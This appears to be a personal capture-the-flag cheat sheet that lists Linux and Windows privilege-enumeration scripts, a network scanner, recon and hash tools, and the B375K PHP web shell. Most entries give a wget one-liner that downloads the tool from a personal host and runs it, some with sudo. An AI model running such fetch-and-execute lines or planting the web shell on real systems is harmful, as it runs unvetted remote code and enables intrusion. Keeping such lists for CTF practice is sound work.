My most used tools for CTF.
Cheatsheets for all kind of tools.
Linpeas is an automated tool for Linux enumaration.
wget "https://tools.ntaheij.dev/linpeas.sh" -O linpeas.sh; chmod 700 linpeas.sh; ./linpeas.sh
Winpeas is an automated tool for Windows enumaration.
Linenum is an automated tool for Linux enumaration.
wget "https://tools.ntaheij.dev/linenum.sh" -O linenum.sh; chmod 700 linenum.sh; ./linenum.sh
Linux Smart Enumaration is an automated tool for Linux enumaration.
wget "https://tools.ntaheij.dev/lse.sh" -O lse.sh; chmod 700 lse.sh; ./lse.sh
B375K is a multi-purpose php reverse shell.
wget "https://tools.ntaheij.dev/b375k.php" -O b375k.php
Scanner is a tool to scan your network for computers with open ports.
wget "https://tools.ntaheij.dev/scanner.py" -O scanner.py; chmod 700 scanner.py; ./scanner.py
SumRecon is a tool for web recon.
wget "https://tools.ntaheij.dev/sumrecon.sh" -O sumrecon.sh; chmod 700 sumrecon.sh; sudo ./sumrecon.sh
Hashalyzer is a tool for analyzing hashes.
wget "https://tools.ntaheij.dev/hashalyzer" -O hashalyzer; chmod 700 hashalyzer; sudo ./hashalyzer